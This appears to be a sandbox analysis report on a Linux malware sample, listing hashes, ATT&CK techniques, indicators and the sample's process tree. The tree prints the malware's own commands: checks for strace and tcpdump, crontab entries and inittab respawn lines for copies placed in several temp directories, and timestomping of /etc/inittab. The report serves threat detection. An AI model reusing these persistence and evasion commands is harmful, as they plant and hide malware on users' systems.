4817893f8e724cbc5186e17f46d316223b7683dcbc9643e364b5913f8d2a9197

General

Target

pty1tgkzvpot
Size

156KB
MD5

4aa80ec9c4af1849fb3f0c82cf82c99b
SHA1

0a2ad5795cbafb1f2962c27ce0fe657704d146ee
SHA256

4817893f8e724cbc5186e17f46d316223b7683dcbc9643e364b5913f8d2a9197
SHA512

6d51053d173efcbfed3b89294e1f8c17c90795054ce4f7c5fcb18c12bbcbed8cb31f27b5ef354aeb9909d3beb03a1797b94c6f9ac32dfd5b1697f52ceccd5356

Score

9^/10

persistence

Malware Config

Signatures

Writes file to system bin folder 1 TTPs 3 IoCs

Hijack Execution Flow

T1574

description	ioc
/bin/crontab	/bin/crontab
/bin/nvram	/bin/nvram
/bin/uname	/bin/uname

Modifies rc script 1 TTPs 1 IoCs

Adding/modifying system rc scripts is a common persistence mechanism.

persistence

Boot or Logon Autostart Execution

T1547

description	ioc	Process
/etc/rc.local	/etc/rc.local	pty1tgkzvpot

Write file to user bin folder 1 TTPs 2 IoCs

Hijack Execution Flow

T1574

description	ioc
/usr/bin/crontab	/usr/bin/crontab
/usr/sbin/nvram	/usr/sbin/nvram

Reads runtime system information 20 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
/proc/filesystems	/proc/filesystems	crontab
/proc/filesystems	/proc/filesystems	crontab
/proc/filesystems	/proc/filesystems	crontab
/proc/filesystems	/proc/filesystems	crontab
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	crontab
/proc/filesystems	/proc/filesystems	crontab
/proc/filesystems	/proc/filesystems	crontab
/proc/filesystems	/proc/filesystems	crontab
/proc/filesystems	/proc/filesystems	crontab
/proc/filesystems	/proc/filesystems	crontab
/proc/filesystems	/proc/filesystems	crontab
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	crontab
/proc/filesystems	/proc/filesystems	crontab
/proc/filesystems	/proc/filesystems	crontab
/proc/filesystems	/proc/filesystems	crontab
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	crontab
/proc/filesystems	/proc/filesystems	cp

Writes file to tmp directory 5 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
/tmp/.bawtz	/tmp/.bawtz	pty1tgkzvpot
/tmp/pty1tgkzvpot	/tmp/pty1tgkzvpot	cp
/tmp/pty1tgkzvpot	/tmp/pty1tgkzvpot	cp
/tmp/pty1tgkzvpot	/tmp/pty1tgkzvpot	cp
/tmp/pty1tgkzvpot	/tmp/pty1tgkzvpot	cp

./pty1tgkzvpot
./pty1tgkzvpot
1⤵
- Modifies rc script
- Writes file to tmp directory
PID:320

/bin/sh
sh -c "pidof -x strace > /dev/null"
1⤵
PID:321
- /bin/pidof
  pidof -x strace
  2⤵
  PID:322

/bin/sh
sh -c "pidof -x tcpdump > /dev/null"
1⤵
PID:323
- /bin/pidof
  pidof -x tcpdump
  2⤵
  PID:324

/bin/sh
sh -c "cat /etc/inittab | grep -v \"/tmp/pty1tgkzvpot\" > /etc/inittab2"
1⤵
PID:327
- /bin/cat
  cat /etc/inittab
  2⤵
  PID:331
- /bin/grep
  grep -v /tmp/pty1tgkzvpot
  2⤵
  PID:334

/bin/sh
sh -c "crontab -r"
1⤵
PID:329
- /usr/bin/crontab
  crontab -r
  2⤵
  - Reads runtime system information
  PID:333

/bin/sh
sh -c "crontab -l | grep /tmp/pty1tgkzvpot | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/pty1tgkzvpot > /dev/null 2>&1 &\") | crontab -"
1⤵
PID:330
- /usr/bin/crontab
  crontab -l
  2⤵
  - Reads runtime system information
  PID:332
- /bin/grep
  grep /tmp/pty1tgkzvpot
  2⤵
  PID:335
- /bin/grep
  grep -v "no cron"
  2⤵
  PID:336
- /usr/bin/crontab
  crontab -
  2⤵
  - Reads runtime system information
  PID:342

/bin/sh
sh -c "echo \"0:2345:respawn:/tmp/pty1tgkzvpot\" >> /etc/inittab2"
1⤵
PID:340

/usr/bin/crontab
crontab -l
1⤵
- Reads runtime system information
PID:343

/bin/sh
sh -c "cat /etc/inittab2 > /etc/inittab"
1⤵
PID:344
- /bin/cat
  cat /etc/inittab2
  2⤵
  PID:345

/bin/sh
sh -c "rm -rf /etc/inittab2"
1⤵
PID:346
- /bin/rm
  rm -rf /etc/inittab2
  2⤵
  PID:347

/bin/sh
sh -c "touch -acmr /bin/ls /etc/inittab"
1⤵
PID:348
- /usr/bin/touch
  touch -acmr /bin/ls /etc/inittab
  2⤵
  PID:349

/bin/sh
sh -c "cp -f /tmp/pty1tgkzvpot /dev/shm/pty1tgkzvpot"
1⤵
PID:352
- /bin/cp
  cp -f /tmp/pty1tgkzvpot /dev/shm/pty1tgkzvpot
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:354

/bin/sh
sh -c "/bin/uname -n"
1⤵
PID:353
- /bin/uname
  /bin/uname -n
  2⤵
  PID:355

/bin/sh
sh -c "cat /etc/inittab | grep -v \"/dev/shm/pty1tgkzvpot\" > /etc/inittab2"
1⤵
PID:357
- /bin/cat
  cat /etc/inittab
  2⤵
  PID:359
- /bin/grep
  grep -v /dev/shm/pty1tgkzvpot
  2⤵
  PID:361

/bin/sh
sh -c "crontab -l | grep /dev/shm/pty1tgkzvpot | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/pty1tgkzvpot > /dev/null 2>&1 &\") | crontab -"
1⤵
PID:358
- /usr/bin/crontab
  crontab -l
  2⤵
  - Reads runtime system information
  PID:360
- /bin/grep
  grep /dev/shm/pty1tgkzvpot
  2⤵
  PID:362
- /bin/grep
  grep -v "no cron"
  2⤵
  PID:363
- /usr/bin/crontab
  crontab -
  2⤵
  - Reads runtime system information
  PID:366

/bin/sh
sh -c "echo \"0:2345:respawn:/dev/shm/pty1tgkzvpot\" >> /etc/inittab2"
1⤵
PID:364

/usr/bin/crontab
crontab -l
1⤵
- Reads runtime system information
PID:367

/bin/sh
sh -c "cat /etc/inittab2 > /etc/inittab"
1⤵
PID:368
- /bin/cat
  cat /etc/inittab2
  2⤵
  PID:369

/bin/sh
sh -c "rm -rf /etc/inittab2"
1⤵
PID:370
- /bin/rm
  rm -rf /etc/inittab2
  2⤵
  PID:371

/bin/sh
sh -c "touch -acmr /bin/ls /etc/inittab"
1⤵
PID:372
- /usr/bin/touch
  touch -acmr /bin/ls /etc/inittab
  2⤵
  PID:373

/bin/sh
sh -c "cp -f /tmp/pty1tgkzvpot /var/tmp/pty1tgkzvpot"
1⤵
PID:374
- /bin/cp
  cp -f /tmp/pty1tgkzvpot /var/tmp/pty1tgkzvpot
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:375

/bin/sh
sh -c "cat /etc/inittab | grep -v \"/var/tmp/pty1tgkzvpot\" > /etc/inittab2"
1⤵
PID:377
- /bin/grep
  grep -v /var/tmp/pty1tgkzvpot
  2⤵
  PID:380
- /bin/cat
  cat /etc/inittab
  2⤵
  PID:379

/bin/sh
sh -c "crontab -l | grep /var/tmp/pty1tgkzvpot | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/pty1tgkzvpot > /dev/null 2>&1 &\") | crontab -"
1⤵
PID:378
- /bin/grep
  grep -v "no cron"
  2⤵
  PID:383
- /usr/bin/crontab
  crontab -l
  2⤵
  - Reads runtime system information
  PID:381
- /bin/grep
  grep /var/tmp/pty1tgkzvpot
  2⤵
  PID:382
- /usr/bin/crontab
  crontab -
  2⤵
  - Reads runtime system information
  PID:386

/bin/sh
sh -c "echo \"0:2345:respawn:/var/tmp/pty1tgkzvpot\" >> /etc/inittab2"
1⤵
PID:384

/usr/bin/crontab
crontab -l
1⤵
- Reads runtime system information
PID:387

/bin/sh
sh -c "cat /etc/inittab2 > /etc/inittab"
1⤵
PID:388
- /bin/cat
  cat /etc/inittab2
  2⤵
  PID:389

/bin/sh
sh -c "rm -rf /etc/inittab2"
1⤵
PID:390
- /bin/rm
  rm -rf /etc/inittab2
  2⤵
  PID:391

/bin/sh
sh -c "touch -acmr /bin/ls /etc/inittab"
1⤵
PID:392
- /usr/bin/touch
  touch -acmr /bin/ls /etc/inittab
  2⤵
  PID:393

/bin/sh
sh -c "cp -f /tmp/pty1tgkzvpot /var/lock/pty1tgkzvpot"
1⤵
PID:394
- /bin/cp
  cp -f /tmp/pty1tgkzvpot /var/lock/pty1tgkzvpot
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:395

/bin/sh
sh -c "cat /etc/inittab | grep -v \"/var/lock/pty1tgkzvpot\" > /etc/inittab2"
1⤵
PID:397
- /bin/cat
  cat /etc/inittab
  2⤵
  PID:399
- /bin/grep
  grep -v /var/lock/pty1tgkzvpot
  2⤵
  PID:400

/bin/sh
sh -c "crontab -l | grep /var/lock/pty1tgkzvpot | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/pty1tgkzvpot > /dev/null 2>&1 &\") | crontab -"
1⤵
PID:398
- /bin/grep
  grep /var/lock/pty1tgkzvpot
  2⤵
  PID:402
- /bin/grep
  grep -v "no cron"
  2⤵
  PID:403
- /usr/bin/crontab
  crontab -l
  2⤵
  - Reads runtime system information
  PID:401
- /usr/bin/crontab
  crontab -
  2⤵
  - Reads runtime system information
  PID:406

/bin/sh
sh -c "echo \"0:2345:respawn:/var/lock/pty1tgkzvpot\" >> /etc/inittab2"
1⤵
PID:404

/usr/bin/crontab
crontab -l
1⤵
- Reads runtime system information
PID:407

/bin/sh
sh -c "cat /etc/inittab2 > /etc/inittab"
1⤵
PID:408
- /bin/cat
  cat /etc/inittab2
  2⤵
  PID:409

/bin/sh
sh -c "rm -rf /etc/inittab2"
1⤵
PID:410
- /bin/rm
  rm -rf /etc/inittab2
  2⤵
  PID:411

/bin/sh
sh -c "touch -acmr /bin/ls /etc/inittab"
1⤵
PID:412
- /usr/bin/touch
  touch -acmr /bin/ls /etc/inittab
  2⤵
  PID:413

/bin/sh
sh -c "cp -f /tmp/pty1tgkzvpot /var/run/pty1tgkzvpot"
1⤵
PID:414
- /bin/cp
  cp -f /tmp/pty1tgkzvpot /var/run/pty1tgkzvpot
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:415

/bin/sh
sh -c "cat /etc/inittab | grep -v \"/var/run/pty1tgkzvpot\" > /etc/inittab2"
1⤵
PID:417
- /bin/cat
  cat /etc/inittab
  2⤵
  PID:419
- /bin/grep
  grep -v /var/run/pty1tgkzvpot
  2⤵
  PID:420

/bin/sh
sh -c "crontab -l | grep /var/run/pty1tgkzvpot | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/pty1tgkzvpot > /dev/null 2>&1 &\") | crontab -"
1⤵
PID:418
- /bin/grep
  grep -v "no cron"
  2⤵
  PID:423
- /bin/grep
  grep /var/run/pty1tgkzvpot
  2⤵
  PID:422
- /usr/bin/crontab
  crontab -l
  2⤵
  - Reads runtime system information
  PID:421
- /usr/bin/crontab
  crontab -
  2⤵
  - Reads runtime system information
  PID:427